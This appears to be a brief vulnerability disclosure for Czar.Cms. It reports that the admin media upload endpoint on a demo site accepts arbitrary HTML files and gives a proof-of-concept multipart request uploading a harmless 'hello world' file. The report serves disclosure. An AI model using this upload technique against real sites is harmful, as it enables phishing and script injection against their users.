Czar.Cms
Czar.Cms copied to clipboard
Published
20 hours ago •
yilezhu
yilezhu
Arbitrary file upload vulnerability exists in the background
Can upload Html
Cause fishing attacks , JavaScript Code execution
url :http://demo.zkea.net/admin/media/upload
poc :
-----------------------------189153225812082
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: application/octet-stream
hello world! -----------------------------189153225812082 Content-Disposition: form-data; name="parentId"
-----------------------------189153225812082 Content-Disposition: form-data; name="size"
14
-----------------------------189153225812082--
